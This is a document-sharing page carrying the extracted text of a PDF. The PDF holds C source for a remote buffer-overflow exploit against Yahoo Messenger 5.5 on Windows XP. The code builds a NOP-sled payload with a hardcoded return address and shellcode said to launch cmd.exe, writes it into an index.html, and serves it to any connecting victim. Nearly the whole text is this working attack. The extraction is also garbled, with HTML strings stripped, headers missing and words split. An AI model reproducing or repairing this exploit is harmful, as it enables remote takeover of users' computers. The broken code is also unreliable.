Remote Yahoo Messenger Exploiter

Chia sẻ: ™——† Lvlr. DK †——™ »»» V.I.P ««« | Ngày: | Loại File: PDF | Số trang:5

Thêm vào BST

Báo xấu

73
lượt xem 6
download

Download Vui lòng tải xuống để xem tài liệu đầy đủ

Remote Yahoo Messenger V5.5 Exploiter * ---[ Remote yahoo Messenger V5.5 exploiter on Windows XP ]--* Dtors Security Research (DSR) * Code by: Rave * The buffer looks like this * |- */ #include #include #include #include #include /* These are the usual header files */ #include #include #include #define MAXDATASIZE 555 /* Max number of bytes of data */ #define BACKLOG 200 /* Number of allowed connections */ static int port =80; /* library entry inside msvcrt.dll to jmp 0xc (EB0C); */ char sraddress[8]="\x16\xd8\xE8\x77"; /* This shellcode just executes cmd.exe nothing...

Chủ đề:

Bình luận(0) Đăng nhập để gửi bình luận!

Lưu

Nội dung Text: Remote Yahoo Messenger Exploiter

Remote Yahoo Messenger V5.5 Exploiter * ---[ Remote yahoo Messenger V5.5 exploiter on Windows XP ]--- * Dtors Security Research (DSR) * Code by: Rave * The buffer looks like this * |-
printf("\t\t---------------------------------------------------\n\n"); } /* returns the index of the first argument that is not an option; i.e. does not start with a dash or a slash */ int HandleOptions(int argc,char *argv[]) { int i,firstnonoption=0; for (i=1; i< argc;i++) { if (argv[i][0] == '/' || argv[i][0] == '-') { switch (argv[i][1]) { /* An argument -? means help is requested */ case '?': Usage(argv[0]); break; case 'P': port=atoi(argv[i+1]);break; case 'H': if (!stricmp(argv[i]+1,"help")) { Usage(argv[0]); break; } /* If the option -h means anything else * in your application add code here * Note: this falls through to the default * to print an "unknow option" message */ /* add your option switches here */ default: fprintf(stderr,"unknown option %s\n",argv[i]); break; } } else { firstnonoption = i; break; } } return firstnonoption; } int main(int argc,char *argv[]) { FILE *fptr; unsigned char buffer[5000]; int offset=320; //
struct sockaddr_in server; /* server's address information */ struct sockaddr_in client; /* client's address information */ struct hostent *he; /* pointer for the host entry */ WSADATA wsdata; WSAStartup(0x0101,&wsdata); if (argc == 1) { /* If no arguments we call the Usage routine and exit */ Usage(argv[0]); return 1; } HandleOptions(argc,argv); fprintf(stdout,"Creating index.html: "); if ((fptr =fopen("index.html","w"))==NULL){ fprintf(stderr,"Failed\n"); exit(1); } e lse { fprintf(stderr,"Done\n"); } // memseting the buffers for preperation memset(sd,0x00,MAXDATASIZE); memset(buffer,0x00,offset+32+strlen(shellcode)); memset(buffer,0x90,offset); // whe place the a jmp ebp+0x3 instuction inside the buffer // to jump over the eip changing bytes at the en offset // // jmp 0x3 // |____________^ buffer[offset-4]=0xeb; buffer[offset-3]=0x03; memcpy(buffer+offset,sraddress,4); memcpy(buffer+offset+4,shellcode,strlen(shellcode)); // here whe make the index.html // whe open it again if some one connects to the exploiting server // and send it over to the victim. fprintf(fptr,"",0x22,0x22); fprintf(fptr,""); fprintf(fptr,"Oohhh my god exploited\n"); fprintf(fptr,"",0x22,0x22); fprintf(fptr,"");
fprintf(fptr,"", 0x22,0x22,0x22,0x22,0x22,0x22); fprintf(fptr,"Dtors Security Research (DSR)\n"); fprintf(fptr,"Yah000 Messager Version 5.5 exploit....\n"); fprintf(fptr,""); fprintf(fptr,"Contach heaven\x00\x00\x00",0x22,buffer,0x22); fprintf(fptr,".... \x00\x00\x00",0x22,0x22); fclose(fptr); //
printf("You got a connection from %s (%s)\n", ine t_ntoa(client.sin_addr),he ->h_name); /* prints client's IP */ fprintf(stdout,"\nOpening index.html for remote user: "); if ((fptr =fopen("index.html","r"))==NULL){ fprintf(stderr,"Failed\n"); exit(1); } e lse { fprintf(stderr,"Done\n"); } fprintf(stdout,"Sending the overflow string... "); // reading the index.html file and sending its // contents to the connected victim while (!feof(fptr)) { send(fd2,sd,strlen(sd),0); numbytes=fread(sd,sizeof(char),MAXDATASIZE,fptr); sd[numbytes * sizeof(char)]='\0'; } send(fd2,sd,strlen(sd),0); printf("\n\n\nExploit Done....\n\n\n"); printf("A shell is started @ %s lol\n\n\nPress any key to exit the exploit",inet_ntoa(client.sin_addr),he ->h_name); gets(sd); exit(0); } return 0; }